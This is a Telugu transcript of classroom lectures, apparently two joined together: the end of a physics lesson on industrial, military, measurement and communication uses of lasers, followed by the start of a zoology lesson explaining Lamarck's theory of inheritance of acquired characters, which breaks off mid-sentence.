అబ్జర్వ్ చేయొచ్చు. సో ఆటోమేటిక్గా బాడీ యొక్క రొటేషన్ని కానీ ఎంత యాంగిల్ రొటేట్ అయిందని కానీ ఈ లేజర్ గైరోస్కోప్ ఇన్స్ట్రుమెంట్ ఉపయోగించి మెజర్ చేయొచ్చు. అయితే ఈ లేజర్ గైరోస్కోప్ ఇన్స్ట్రుమెంట్ ఎక్కడ వాడతాం? ఇది మనకి ఇనర్షియల్ గైడెన్స్ ఆఫ్ మిసైల్స్లో కానీ, ఎయిర్ క్రాఫ్ట్స్లో కానీ, షిప్స్లో కానీ, మనం ఫ్లైట్ కంట్రోల్ సిస్టమ్స్లో కానీ ఈ లేజర్ గైరోస్కోప్ అనేది వాడడం జరుగుతుంది. నెక్స్ట్ ఎయిర్ రీకొనెసెన్స్ అంటే ఏంటి? ఇప్పుడైతే మనం ఎనిమీ యొక్క ట్యాంక్స్ని కానీ నైట్ టైంలో సీక్రెట్గా ఫోటోగ్రఫీ తీయాలి అంటే మనం వాటిని లేజర్ లైట్స్ ఉపయోగించి తీయొచ్చు. ఇన్ ఓల్డెన్ డేస్లో మనం అక్కడ ఏం చేసేవాళ్ళం అంటే కెమెరాస్ పెట్టి పవర్ స్ట్రోబ్స్ లైటింగ్ ఫెసిలిటీ పెట్టి మనం అప్పుడు ఫొటోస్ తీసేవాళ్ళం. కానీ ఇప్పుడు లేజర్ లైట్ పెట్టడం వల్ల సీక్రెట్గా మనం బయట వాళ్ళకి తెలియకుండా ఒక ఫ్లైట్ వెళ్తున్నప్పుడు కిందనున్న మొత్తం పిక్చర్ అంతటిని కూడా మనం ఫొటోస్ రూపంలో హై రెజల్యూషన్లో మనం ఫోటోగ్రఫీస్ని అబ్జర్వ్ చేయొచ్చు. ఇందులో వాడేది హీలియం నియాన్ లేజరు, అదేవిధంగా గ్యాలియం ఆర్సెనైడ్ లేజర్. నెక్స్ట్ లేజర్ డ్రిల్లింగ్. ఇండస్ట్రీస్ పర్పసెస్లో ఫస్ట్ ప్రాసెస్ లేజర్ డ్రిల్లింగ్. ఈ లేజర్ డ్రిల్లింగ్ ఏం చేస్తుంది? ఇది ఫేస్ హీటింగ్ ఫినామినన్ మీద ఆధారపడుతూ వర్క్ అవుతుంది. ఇందులో ఒక సర్ఫేస్ మీద హై ఇంటెన్సిటీ లేజర్ బీమ్ పడడం వల్ల ఆ సర్ఫేస్ మొత్తం టెంపరేచర్ పెరగడం వల్ల అది మొత్తం కూడా మెల్ట్ అవుతుంది. మెల్ట్ కావడం వల్ల అక్కడున్న సర్ఫేస్ యొక్క మెటీరియల్ యొక్క టెంపరేచరు బాయిలింగ్ పాయింట్ టెంపరేచర్ కన్నా పెరిగినప్పుడు అది మొత్తం ఆ సర్ఫేస్లో మీద ఉన్న మెటీరియల్ మొత్తం కూడా వేపర్ స్టేట్లోకి మారుతుంది. యాజ్ ఎ రిజల్ట్ అక్కడ హోల్ ఏర్పడుతుంది. ఇందులో వాడే లేజర్స్ CO2 లేజర్ వాడతాం, అదేవిధంగా NDYAG లేజర్ వాడతాం. ఈ ఫినామినన్ మనం డైమండ్స్లో కానీ రుబీ క్రిస్టల్స్లో కానీ హోల్స్ని డ్రిల్ చేయడానికి వాడతాం. నెక్స్ట్ లేజర్ మైక్రో మెషినింగ్. ఈ లేజర్ మైక్రో మెషినింగ్ దేనికి ఉపయోగపడుతుంది? ఇది మైక్రోమీటర్ సైజ్ ఏరియాస్ని పక్కనున్న ఏరియాస్ ఏవి డ్యామేజ్ అవ్వకుండా హీట్ చేయడానికి ఉపయోగపడుతుంది. అదేవిధంగా టైనీ ఎలక్ట్రానిక్ సర్క్యూట్స్ అనేవి సెరమిక్ సబ్స్ట్రేట్స్ మీద ఫార్మ్ అవ్వడానికి కూడా ఈ మైక్రో మెషినింగ్ అనేది వాడడం జరుగుతుంది. నెక్స్ట్ లేజర్ కటింగ్. ఈ లేజర్ ఫర్ ఎగ్జాంపుల్ గ్రాఫైట్ కానీ, డైమండ్ కానీ, నెక్స్ట్ సెరమిక్ సబ్స్టెన్సెస్ కానీ, లేదా కార్బైడ్ కానీ, టంగ్స్టన్ కానీ కట్ చేయాలంటే మనం ఈ లేజర్ కటింగ్ ఫినామినన్ అనేది వాడుతున్నాం. ఇందులో అన్ని గ్యాసెస్ లేజర్స్ మనం వాడుకోవచ్చు. అయితే గ్యాస్ లేజర్స్తో పాటు వాటిని అసిస్ట్ చేయడానికి ఆక్సిజన్ గ్యాస్ కానీ, కార్బన్ డైఆక్సైడ్ కానీ కలిపి పంపించాల్సి ఉంటుంది. అయితే ఎక్కువగా ఈ లేజర్ కటింగ్ ఫినామినన్ ప్రజెంట్ డేస్లో గార్మెంట్ ఇండస్ట్రీస్లో వాడుతున్నాం. గార్మెంట్ ఇండస్ట్రీస్లో ఏమవుతుందంటే ఎక్కువ లేయర్స్లో ఉన్న క్లాత్ని, థిక్ క్లాత్ని అట్ ఏ టైం సింగిల్ టైం ఇంటర్వెల్లో, చాలా షార్ట్ టైం ఇంటర్వెల్లో కట్ చేయడానికి మనం ఈ లేజర్ కటింగ్ ఫినామినన్ అనేది గార్మెంట్ ఇండస్ట్రీలో వాడడం జరుగుతుంది. నెక్స్ట్ లేజర్ హార్డనింగ్. లేజర్ హార్డనింగ్లో జరిగే ప్రాసెస్ ఏంటి? అది ఒక మెటీరియల్ సర్ఫేస్ని ఇర్రేడియేషన్ ప్రాసెస్ అనేది షార్ట్ ఇంటర్వెల్ ఆఫ్ టైంలో ఇర్రేడియేషన్కి గురి చేస్తే ఆ పైన మెటీరియల్ మొత్తం మనకి మెల్ట్ అవుతుంది. పైన మెటీరియల్ మొత్తం మెల్ట్ అవుతుంది, కానీ కిందనున్న మెటీరియల్ ఇమీడియట్గా కూలింగ్ అరేంజ్మెంట్కి లోన్ కావడం వల్ల ఆ మెటీరియల్ మొత్తం హార్డెన్ అవుతుంది. కాబట్టి మొత్తం కిందనున్న మెటీరియల్ కూడా హార్డనింగ్ అవ్వడం వల్ల ఇది మనకి పాసిబుల్ సబ్స్టిట్యూషన్ ఆఫ్ ఎక్స్పెన్సివ్ అలాయ్ స్టీల్స్. అలాయ్ స్టీల్స్లో ఎక్స్పెన్సివ్ మెటీరియల్స్ ఏమైనా ఉంటే వాటి ప్లేసెస్లో ఈ లేజర్ హార్డనింగ్ ద్వారా తయారు చేయబడిన మెటీరియల్స్ వాడుకోవచ్చు. ఇందులో మనం వాడేది CO2 లేజర్. నెక్స్ట్ మెట్రాలజీలో ఏమవుతుందంటే మనం ఆప్టికల్ క్యారెక్టరిస్టిక్స్ని కానీ, లేదా వెలాసిటీస్ని కానీ, లెంత్ని కానీ మెజర్ చేయడం jరుగుతుంది. నెక్స్ట్ అదేవిధంగా మనకి డిస్టెన్సెస్ని వేవ్ లెంత్ రూపంలో మెజర్ చేయొచ్చు. ఇందులో మనం వాడేది హీలియం నియాన్ లేజర్. నెక్స్ట్ ఇందులో మనం వాడే డివైస్ లేజర్ అల్టిమీటర్. ఈ లేజర్ అల్టిమీటర్ దేనికి ఉపయోగపడుతుందంటే
ఎయిర్ క్రాఫ్ట్స్ యొక్క హైట్ ఎంత హైట్లో ఉన్నాయి గ్రౌండ్ నుంచి ఆ హైట్ని మెజర్ చేయొచ్చు. అలాగే వాటి రేట్ ఆఫ్ అసెంట్ని కానీ రేట్ ఆఫ్ డిసెంట్ని కానీ మెజర్ చేయొచ్చు. నెక్స్ట్ ఇందులో క్లౌడ్స్ ఉంటే డిఫరెంట్ క్లౌడ్స్, ఆ క్లౌడ్స్ ఎర్త్ సర్ఫేస్ నుంచి ఎంత హైట్లో ఉన్నాయి కూడా ఈ లేజర్ అల్టిమీటర్ను ఉపయోగించి మనం మెజర్ చేయొచ్చు. ఇందులో వాడేది హీలియం నియాన్ లేజర్. నెక్స్ట్ సర్వేయింగ్. ఈ సర్వేయింగ్ డివైసెస్లో మనం ఎక్కువగా వాడేది జియోడీమీటర్. ఈ జియోడీమీటరు ఏ ప్రిన్సిపల్ పై ఆధారపడుతూ పనిచేస్తుంది? ఈ జియోడీమీటర్ ఏం చేస్తుందంటే దీని నుంచి ఎలక్ట్రోమాగ్నెటిక్ వేవ్స్ని పంపి ఎలక్ట్రోమాగ్నెటిక్ వేవ్స్ ఆ మీడియంలో ఎంత టైంలో ట్రావెల్ చేస్తాయి ఆ టైంని క్యాలిక్యులేట్ చేసి దాని నుంచి డిస్టెన్సెస్ని మెజర్ చేస్తాయి. సో ఈ జియోడీమీటర్లో మనకి అబ్జర్వ్ చేస్తే దాని ఫంక్షన్లో ఒక లైట్ సోర్స్ అనేది వాడడం అవసరం అవుతుంది. ఈ లైట్ సోర్స్ కనుక మనం లేజర్ లైట్ సోర్స్ వాడితే మనకి యాక్యురేట్ మెజర్మెంట్స్ వస్తాయి, అదేవిధంగా ఫాస్టర్ మెజర్మెంట్స్ వస్తాయి, అదేవిధంగా లాంగ్ రేంజ్ మెజర్మెంట్స్ వస్తాయి. సిమిలర్గా ఆప్టికల్ ఫైబర్ కమ్యూనికేషన్. ఈ ఆప్టికల్ ఫైబర్ కమ్యూనికేషన్లో ఎప్పుడైతే ఇన్ఫర్మేషన్ మొత్తం లైట్ వేవ్ రూపంలోకి మారుతుందో ఆ సమయంలో మొత్తం ఇన్ఫర్మేషన్ మొత్తం కూడా చాలా ఫాస్ట్గా మనకి రిసీవింగ్ ఎండ్కి వెళ్తుంది. ఈ రిసీవింగ్ ఎండ్ వెళ్ళడం వల్ల ఇన్ఫర్మేషన్ చాలా తక్కువ టైంలో ఒక ఎండ్ నుంచి ఇంకొక ఎండ్కి ట్రావెల్ చేస్తుంది. దీస్ ఆర్ ద అడ్వాంటేజెస్ ఆఫ్ ద లేజర్ ఫైబర్ ఆప్టికల్ ఫైబర్ కమ్యూనికేషన్. అదేవిధంగా డేటా స్టోరేజ్. ఒక థిన్ ఫిల్మ్ మీద మనకి హై ఎనార్మస్ డేటా అనేది లేజర్స్ ఉపయోగించి స్టోర్ చేయొచ్చు. దీస్ ఆర్ ద రీడ్ అండ్ రైట్ లేజర్స్ విచ్ ఆర్ యూజ్డ్ ఫర్ రీడింగ్ ఆర్ రైటింగ్ ద ఇన్ఫర్మేషన్. కాకపోతే ఈ డేటా స్టోరేజ్ వల్ల మనకు వచ్చే మెయిన్ డిసడ్వాంటేజ్ ఏంటంటే మనకి అది నాట్ ఎరైజబుల్. అదేవిధంగా హాలోగ్రఫీ ఏంటంటే 3D ఇమేజెస్ని ప్రొడ్యూస్ చేయడానికి ఉపయోగపడుతుంది. సో దిస్ ఈజ్ ద 3D ఇమేజ్ ఆఫ్ బ్రెయిన్ అండ్ దిస్ ఈజ్ ద 3D ఇమేజ్ ఆఫ్ ద గ్లోబ్. అదేవిధంగా ప్రింటింగ్ సెక్టర్లో మనం లేజర్ ప్రింటర్స్ మన డే టు డే లైఫ్లో చాలా వాడుతున్నాం. అదేవిధంగా హై స్పీడ్ ఫోటోగ్రఫీ అంటే ఒక బుల్లెట్ని ఒక గన్ నుంచి వస్తున్న బుల్లెట్ని ఫోటోగ్రాఫ్ చేయడంలో కానీ లేదా ఆర్మర్ పెనిట్రేషన్స్లో కానీ మనం ఈ లేజర్ లైట్ని వాడడం వల్ల మనకు ఆ ఫోటోగ్రఫీ అనేది క్లియర్గా వస్తుంది. నెక్స్ట్ డిఫరెంట్ రీసెర్చ్ ఫీల్డ్స్లో వాడచ్చు వీటిని మనం. ఫీల్డ్ ఆఫ్ ఫిజిక్స్ ఆర్ కెమిస్ట్రీ అండ్ బయాలజీ. అదేవిధంగా మనకి ఎంటర్టైన్మెంట్ సెక్టర్లో కూడా మనం వీటిని బాగా వాడచ్చు. డిఫరెంట్ ఫోర్ట్స్లో మనకి లేజర్ లైట్ షోస్ ఉంటున్నాయి. సో ఈ లేజర్ లైట్ షోస్ హై ప్రొజెక్టెడ్ లేజర్ బీమ్స్ అనేవి మ్యూజిక్తో పాటు డ్యాన్స్ అవుతుంటాయి. అదేవిధంగా మనకు డిఫరెంట్ మూవీస్లో స్పెషల్ ఎఫెక్ట్స్ అనేవి ఈ లేజర్ లైట్స్ వల్లే మనకి ప్రొడ్యూస్ అవుతున్నాయి. సో థ్యాంక్ యూ. ఈరోజు మనం ఈ పాఠ్యాంశంలో ద్వితీయ సంవత్సరం జంతుశాస్త్రానికి సంబంధించి జీవ పరిణామం అనేటటువంటి పాఠ్యాంశంలో కొన్ని ముఖ్యమైనటువంటి జీవ పరిణామ సిద్ధాంతాలను గురించి చర్చించుకుందాం. జీవ పరిణామానికి సంబంధించి ప్రారంభంలో నిర్జీవ సృష్టివాదం, ఎబయోజెన్సిస్ సిద్ధాంతం, ప్రత్యేక సృష్టివాదం అనేటటువంటి సిద్ధాంతాలను ప్రతిపాదించిన తరువాత మొదటగా శాస్త్రవేత్తలందరికీ ఆమోదయోగ్యమైనటువంటి సిద్ధాంతాన్ని ప్రతిపాదించినటువంటి శాస్త్రవేత్త ఎవరంటే లామార్క్. సో లామార్క్ ప్రతిపాదించినటువంటి పరిణామ సిద్ధాంతాన్ని మనం మొదటగా చూద్దాం. లామార్క్ ప్రతిపాదించినటువంటి సిద్ధాంతాన్ని లామార్కిజం అంటాం. లామార్క్ ఏదైతే జీవ పరిణామానికి సంబంధించి సిద్ధాంతాన్ని ప్రతిపాదించారో ఆ ప్రతిపాదనలో ఉన్నటువంటి ముఖ్యమైనటువంటి అంశం ఏంటంటే ఆర్జిత గుణాల అనువంశికత, ఇన్హెరిటెన్స్ ఆఫ్ ఎక్వైర్డ్ క్యారెక్టర్స్ అంటాం దాన్ని. అంటే
పరిణామ క్రమంలో చూసినప్పుడు, జీవ పరిణామం తీసుకున్నప్పుడు వాతావరణంలో సంభవించేటటువంటి మార్పులకు అనుగుణంగా జీవులు కొన్ని ప్రత్యేక మార్పులను పొందుతాయి. ఆ పొందినటువంటి మార్పులు ఏ రకంగా అనువంశికత చెందుతాయి అంటే తర్వాతి తరాలకు అందచేయబడతాయో లామార్క్ వివరించడానికి ప్రయత్నం చేశారు. ఇక్కడ మనం మొదటగా గుర్తుపెట్టుకోవాల్సింది ఏంటంటే, ఈ పరిణామ సిద్ధాంతాలన్నీ కూడా పరిణామం గురించి నిర్వచనం ఇవ్వలేదు, పరిణామం ఎలా జరిగిందో చెప్పడానికి ప్రయత్నం చేసింది. జీవ పరిణామం అంటే, జీవ పరిణామం మనకు నిర్వచనం మనందరికీ తెలిసిందే. అంటే సరళమైనటువంటి జీవుల నుంచి సంక్లిష్టమైనటువంటి జీవుల యొక్క అభివృద్ధి, ఆ ప్రక్రియని అధ్యయనాన్ని మనం జీవ పరిణామానికి నిర్వచించుకుంటే, ఆ ప్రక్రియ అనేది జీవ సంబంధంగా వాతావరణంతో మమేకమై ఏ రకంగా సంభవించిందో చెప్పడానికి ప్రయత్నం చేసినయే ఈ పరిణామ సిద్ధాంతాలు. మొదటగా మనం లామార్కిజం గురించి చూద్దాం. సో ఈ లామార్కిజం, ఈ పాఠ్యాంశం యొక్క ముఖ్య ఉద్దేశం ఏంటంటే, మనం మొదటగా లామార్కిజం అంటే ఏంటో చూస్తాం. తర్వాత జీవ పరిణామంలో లామార్కిజం యొక్క విశిష్టత, దాని యొక్క ప్రాముఖ్యత, అంటే అంతకుముందు చెప్పినటువంటి పరిణామ సిద్ధాంతాలన్నీ పరిగణలోకి తీసుకుంటే దానికిను ఇప్పుడు చెప్పబోయేటటువంటి లామార్కిజానికి ఉన్నటువంటి భేదం ఏమిటి, ఏ రకంగా లామార్క్ సిద్ధాంతం అనేది శాస్త్రవేత్తలు ఆమోదయోగ్యమైంది అనేది మనం గమనిస్తాం. తర్వాత లామార్క్ చెప్పినటువంటి లామార్కిజానికి సంబంధించి ఉదాహరణలు ఏ రకంగా ఉంటే చూద్దాం. సో ఈ పటంలో చూస్తే కనుక జీన్ బాప్టిస్ట్ డి లామార్క్ 1744-1829, ఈయన ఫ్రెంచ్ శాస్త్రవేత్త, జీవ పరిణామానికి సంబంధించి లామార్కిజం లేదా ఆర్జిత గుణాల అనువంశికత అనేటటువంటి సిద్ధాంతాన్ని ప్రతిపాదించారు. లామార్క్ రచించినటువంటి గ్రంథం తీసుకుంటే కనుక ఫిలాసఫీ జూలాజిక్ అనేటటువంటి గ్రంథాన్ని ఈ పరిణామ సిద్ధాంతాలకు సంబంధించినటువంటి పరిశోధనలు మరియు పరిణామ సిద్ధాంతాలకు సంబంధించినటువంటి అన్ని పరిశీలనల్ని క్రోడీకరించి రచించినటువంటి గ్రంథమే ఫిలాసఫీ జూలాజిక్. లామార్క్ సిద్ధాంతాన్ని, లామార్కిజం అంటే దాంట్లో ఏం వివరిస్తుంది, లామార్కిజం లేదా ఆర్జిత గుణాల అనువంశికత అనేది జీవ పరిణామానికి సంబంధించి లామార్క్ ప్రతిపాదించినటువంటి సిద్ధాంతం. లామార్కిజం విశ్లేషించేది ప్రధానమైనటువంటి అంశం ఏంటంటే కనుక ఆర్జిత గుణాల అనువంశికత. ఒక జీవి తన జీవిత కాలంలో ఏదైతే కొన్ని ప్రత్యేక లక్షణాలను పొందిందో ఆ పొందినటువంటి లక్షణాలని తరువాతి తరాలకి ఏ రకంగా సంక్రమింపచేస్తుంది అనేది లామార్కిజం యొక్క ప్రధానమైనటువంటి అంశంగా మనం పరిగణించవచ్చు. ఈ లామార్కిజంలో లామార్క్ ఏ రకంగా వాతావరణ పరిస్థితులు లేదా వాతావరణ మార్పులని జీవి మీద ప్రభావితం చేస్తాయి, జీవిని ప్రభావితం చేస్తాయని పరిగణలోకి తీసుకుంటూ చెప్పినటువంటి మొదటి అంశం ఏంటంటే, బాహ్య వాతావరణంలోని మార్పులను బట్టి జీవులలో మార్పులు వస్తాయి. రెండవ అంశం, జీవులలో భిన్నత్వానికి కారణం మూల ప్రామాణికమైనటువంటి ఏకత్వం. సో లామార్కు తన సిద్ధాంతాన్ని, లామార్కిజం లేదంటే కనుక మనం ఆర్జిత గుణాల అనువంశికతను చెప్పుకున్నాం కదా, ఈ చెప్పేటప్పుడు ఆయన పరిశీలించినటువంటి అంశాలు ఈ రెండు ప్రధానమైనటువంటి అంశాలు. మొదటిది, బాహ్య వాతావరణంలో మార్పులను బట్టి జీవులలో మార్పులు వస్తాయి. అంటే జీవులన్నీ కూడా జీవి చుట్టూ ఉన్నటువంటి వాతావరణాన్ని తీసుకుంటే కనుక మాధ్యమం లేదా వాతావరణం అనుకుంటాం. ఈ వాతావరణంలో సంభవించేటటువంటి మార్పులను బట్టి జీవులలో మార్పులు వస్తాయని ఫస్ట్ ప్రతిపాదన, తను పరిశీలించినటువంటి మొదటి అంశం అది. రెండోది, జీవులలో భిన్నత్వానికి కారణం మూల ప్రామాణికమైనటువంటి ఏకత్వం. ఇక్కడ ప్రతి జీవి ఇంకొక జాతి తీసుకున్నప్పుడు ఒక జాతికి ఇంకో జాతికి తేడాలు కనిపిస్తూ ఉంది. ఆ తేడా కనిపించడానికి కారణం ఏంటో వివరిస్తే ఆయన ఏం చెప్పాడంటే, మౌలికంగా ప్రతి జీవి తీసుకున్నప్పుడు ఆ జీవికి ఉండవలసిన జంతు లక్షణాలు తీసుకుంటా ఉన్నప్పుడు ఆ అన్నీ కూడా సమానత్వాన్ని ప్రదర్శిస్తాయి. మనం జీవులు తీసుకుంటే కనుక జీవి యొక్క నిర్మాణాత్మక క్రియాత్మక ప్రమాణం కణమని చెప్తాం. ఏ జీవులైనా సరే ప్రాథమిక ప్రమాణం కణమైనప్పుడు అన్నిట్లోనూ ఏకత్వం ఉంది. కానీ క్రియాత్మకంగా తీసుకున్నప్పుడు దాంట్లో భిన్నత్వం అనేది ప్రారంభమవటం కారణంగా పరిణామం అనేది సాధ్యపడింది అనేటటువంటి లామార్క్ యొక్క వాదన అన్నమాట. కాబట్టి ఈ రెండు ప్రామాణిక అంశాలు, మొదటిదన్నా చుట్టూ ఉన్నటువంటి వాతావరణము
జీవిలో మార్పులను కలగజేస్తుంది. రెండోది ఏమన్నా జీవులలో ఉన్నటువంటి ఏదైతే ఏకత్వం ఉందో, సిమిలారిటీ లేదా యూనిఫామిటీ ఉందో, అదేమవుతోంది కొన్ని సందర్భాలలో ఈ పర్యావరణ కారణాలు కావచ్చు, వాతావరణ కారణాలు కావచ్చు, దాని వలన ఏమవుతుంది భిన్నత్వానికి దారితీస్తోంది. సో ఏదైనా మార్పు అనేది సంభవిస్తోంది. ఈ మార్పు కారణంగా కొత్త జీవుల యొక్క ఆవిర్భావం జరుగుతుంది అని లామార్క్ యొక్క వాదన అన్నమాట. నెక్స్ట్, ఈ మార్పులు ఎలా సంభవిస్తాయి అనే దాని మీద లామార్క్ చెప్పినటువంటి విశ్లేషణ చూడండి. జీవుల శరీర భాగాలు జీవన అంతర్గత కారకాలతో ప్రభావితమయ్యి నిరంతరం పరిమాణంలో పెరుగుతాయి. సో ఫస్ట్ కాన్సెప్ట్ ఇప్పుడు ఏం చెప్పాడు, జీవి యొక్క పరిసరాల కారణంగా జీవిలో మార్పులు సంభవిస్తాయని లామార్క్ ప్రతిపాదించాడు. ఓకే కాదంట్లా ప్రతిపాదించారు. ఈ ప్రతిపాదనకి ఏం చేశాడు, ఆయన రుజువు చూపించాడు కదా. చూపించేటటువంటి ప్రయత్నంలో ఏం చెప్పాడు, ఫస్ట్ చెప్పింది జీవుల శరీర భాగాలు జీవన అంతర్గత కారకాలతో ప్రభావితమై నిరంతరం పరిమాణంలో పెరుగుతాయి అని చెప్పాడు. అంటే ఏంటి, ప్రతి జీవికి శరీరంలో శరీర భాగాలు ఉంటాయి. శరీర భాగాల యొక్క క్రియాశీలత అనేది వాతావరణం చేత ప్రభావితం చేయబడి వాటి యొక్క పెరుగుదల ఉంటుందని ప్రతిపాదించాడు. అంటే ఏదైతే అవయవం అవసరం అవుతుందో ఆ అవసరం అయ్యేటటువంటి అవయవం పెరుగుదల చూపిస్తూ ఉంటుంది. సో సాధారణ జీవి ఇక్కడ ఈ పెరుగుదల కలిగినటువంటి ఒక అవయవంలో పెరుగుదల కలిగినటువంటి జీవిని మనం తీసుకున్నప్పుడు ఆ జీవికి ఈ జీవికి ఆ క్రియాత్మక దృష్ట్యా మొదట్లో తేడా అనేది అక్కడ సంభవిస్తుంది ఫస్ట్. సో ఇది ప్రాథమిక అంశం, మూల అంశం. రెండు మూల అంశాల్లో ఇది ప్రాథమిక మూల అంశం అన్నమాట. సో ఆయన చెప్పింది ఏంటంటే అంతర్గత కారకాలు, ఈ బాహ్య వాతావరణం ఒక అంశం తీసుకున్నాడు. రెండో అంశం ఏంటంటే అంతర్గత కారకాలు కూడా చెప్తున్నాడు. ఏదైతే జీవి లోపల అంతర్గతంగా ఉన్నటువంటి అంశాలు, శరీర ధర్మపరమైనటువంటి క్రియలు ఉన్నాయి చూసారా, అవి ఈ బాహ్య వాతావరణం చేత ప్రభావితమయ్యి మార్పులు అనేవి సంభవిస్తాయి. సో ఈ మార్పు అనేది మనం ప్రామాణికంగా మనం తీసుకుంటాం. నెక్స్ట్ తర్వాత ఏం చెప్పారో చూడండి. కొత్త అవసరాలకు అనుగుణంగా కొత్త శరీర భాగాలు అభివృద్ధి చెంది స్థిరంగా నిలిచిపోతాయి. వీటినే ఆర్జిత గుణాలు అంటారు. సో ఇంకొక ఇంపార్టెంట్ కాన్సెప్ట్, మనం జీవ పరిణామంలో లామార్క్ చెప్పినప్పుడు లామార్క్ సిద్ధాంతం పేరే ఆర్జిత గుణాల అనువంశికత అని అన్నాం. ఇందాక మనం ఫస్ట్లో మాట్లాడుకున్నాం జీవి యొక్క పరిసరాలలో మార్పులు అని చెప్పాం. పరిసరాలలో మార్పులు ఏం చేస్తున్నాయి, కొత్త అవసరాలను సృష్టిస్తున్నాయి. కొత్త అవసరాలకు అనుగుణంగా జీవులు ఏం చేస్తాయి, ఆ అవసరాలకి అనుగుణంగా కొత్త శరీర భాగాలను అభివృద్ధి చేసుకుంటాయి. అంటే దేహ నిర్మాణంలో చిన్న చిన్న మార్పులు, అంటే ఒక్కసారిగా ఆల్ ఆఫ్ సడన్గా రాదు. కొన్ని వందల వేల సంవత్సరాల పరిణామక్రమం తీసుకున్నప్పుడు మార్పులన్నీ మనం అబ్జర్వ్ చేయగలం. సో కొత్త శరీర భాగాల అభివృద్ధి అనేది జరుగుతూ ఉంటుంది. ఇది బాహ్య వాతావరణంలో మార్పులు. బాహ్య వాతావరణంలో మార్పులకు అనుగుణంగా జీవులలో అవసరాలు మారతాయి. మారినటువంటి అవసరాలకు అనుగుణంగా ఏమవుతుంది, శరీర భాగాల మార్పు జరుగుతుంది. సో శరీర భాగాల మార్పు ఎప్పుడైతే సాధ్యపడిందో, శరీర భాగాల మార్పు ఎప్పుడైతే జరిగిందో, ఈ జరిగిన కారణంగా ఏం జరుగుతుంది, అక్కడ ఉన్నటువంటి జీవిలో, అక్కడ ఉన్నటువంటి జాతిలో చిన్న మార్పు, ఫస్ట్ మొట్టమొదటిగా తీసుకుంటే కనుక చాలా నెగ్లిజిబుల్, మనము లెక్కించలేనటువంటి గుర్తించలేనటువంటి మార్పు అనేది మనం గమనిస్తాం. కాలక్రమంలో ఏమవుతుందంటే ఈ మార్పు, ఈ అభివృద్ధి చెందినటువంటి లేదా ఏర్పడినటువంటి మార్పు, దానికి ఆర్జిత గుణం, అది ఆ జీవే పొందింది, పక్క జీవికి లేదు. ఎందుకని, ఈ జీవే మారినటువంటి వాతావరణానికి గురి కాబడింది, లేదా మారినటువంటి వాతావరణంలో ఉంది, ఉండడానికి వీలుగా అనుకూలత పొందింది. అనుకూలత పొందడంతో పాటుగా అవయవాలలో మార్పును చేసుకుంది. సో ఇలా మార్పులు ఏర్పడినటువంటి మార్పులు ఆ జీవులు తమ జీవిత కాలంలో అలా పొందుపరుచుకుంటాయి. దాంతోపాటుగా ఈ పొందుపరుచుకున్నటువంటి మార్పులు ఏం చేస్తున్నాయి, తర్వాతి తరాలకి అందించేటటువంటి ప్రయత్నం చేస్తాయి. సో దీనినే మనం ఆర్జిత గుణాలు అని అంటున్నాం. దీనినే మనం ఆర్జిత గుణాలు అని పేర్కొంటున్నాం. తర్వాత అంశం చూడండి. కొత్త అవసరాలకు అనుగుణంగా కొత్త వాతావరణంలో అనుకూలతల కోసం జీవులు కొత్త అలవాట్లను, కొత్త ప్రవర్తనను అభివృద్ధి చేసుకుంటాయి. సో ఇందాకేం చెప్పాం, మనము అవయవంలో మార్పు వస్తుందని చెప్పాం. ఇప్పుడేం చెప్తున్నాము, అవయవంతో పాటుగా తన యొక్క ప్రవర్తన, జీవి ప్రవర్తనలో కూడా మార్పు వస్తుందని చెప్తాం.
ఇక్కడ రెండో దానికి సింక్రొనైజ్ చేశాడు. అంతకుముందు ఏం చెప్పాడు, అవయవంలో మార్పు వచ్చిందన్నాడు. అవయవంలో మార్పు వచ్చినప్పుడు ఆ అవయవంలో మార్పుకు అనుగుణంగా ఇంకేం జరిగింది గమనించాడు. అక్కడ మారినప్పుడు ఏం చెప్తున్నారు, కొత్త అవసరాలకు అనుగుణంగా కొత్త వాతావరణంలో జీవులు కొత్త ప్రవర్తన. సో మనకి కనిపించేది ఇంతకుముందు ఏం చెప్పాము, అంతర్గత కారకాల కారణంగా అంతర్గత మార్పులు వస్తున్నాయని చెప్పాము. ఇప్పుడు ఏం చెప్తున్నాం మనము, బహిర్గతంగా కూడా జీవికి బాహ్యంగా చూసినప్పుడు తన యొక్క ప్రవర్తనలో కూడా కొన్ని మార్పులని సంతరించుకుంటుంది, ఏర్పరచుకుంటుంది. సో మనం ఇక్కడ రెండు అంశాలు చూసాం. ఒకటి అవయవాలలో మార్పు అనేది ప్రారంభమైంది, రెండోది అలవాట్లు వాటి యొక్క ప్రవర్తనలో కూడా మార్పు అనేది సాధ్యపడింది. తర్వాత చూద్దాం. సో ఈ కొత్త లక్షణాలు జీవులు పొందడానికి మార్గాలు ఏం చెప్పాడు. ఇప్పుడు రెండు అంశాలు స్థూలంగా మౌలికంగా రెండు అంశాలు చెప్పాం, అవయవాలలో మార్పు, ప్రవర్తనలో మార్పు. సో ఈ మార్పులు పొందడానికి కారణాలు చెప్తా రెండు మార్గాలను చెప్పాడు డార్విన్ గారు. ఒకటేమన్నా ఉపయుక్తత, ఒక అవయవాన్ని ఎక్కువగా ఉపయోగించుకోవటం. రెండోది నిరుపయుక్తత, ఒక అవయవాన్ని తక్కువగా ఉపయోగించుకోవటం. అంటే అవసరాలు మార్పులను బట్టి అవయవాల యొక్క వినియోగంలో తేడా ఉంటుంది. ఎక్కువ ఉపయోగిస్తే దాన్ని ఉపయుక్తత అంటాం, తక్కువగా కనుక ఉపయోగిస్తే కనుక దాన్ని నిరుపయుక్తత అంటాం. సో ఈ అలవాట్ల కారణంగా కానీ ప్రవర్తన కారణంగా కానీ ఏమవుతుందంటే కొన్ని అవయవాలు ఎక్కువగా వినియోగం జరగవచ్చు, లేదంటే కొన్ని అవయవాలు తక్కువగా వినియోగం కూడా జరగవచ్చు. సో ఇందాక మనం చెప్పుకున్న వాతావరణంలో మార్పులు ఎలా వస్తాయి అని. వాతావరణంలో ఉష్ణోగ్రత, కాంతి, మాధ్యమం, ఆహారం జీవులు తీసుకునే ఆహారంలో మార్పుల కారణంగా జీవి యొక్క ప్రవర్తనలోనూ చెప్పుకున్నాం మనం. ఆ మార్పులు ఎలా సాధ్యపడుతున్నాయి చూసుకుంటే కనుక ప్రవర్తన, బిహేవియర్ మరియు శరీర ధర్మక్రియలలోనూ ఫిజియలాజికల్గా కూడా దాంట్లో మార్పులు అనేవి సంభవిస్తాయి. సో వాతావరణంలో సంభవించేటటువంటి ఈ మార్పులు ఉష్ణోగ్రత, కాంతి కానీ, మాధ్యమం కానీ, 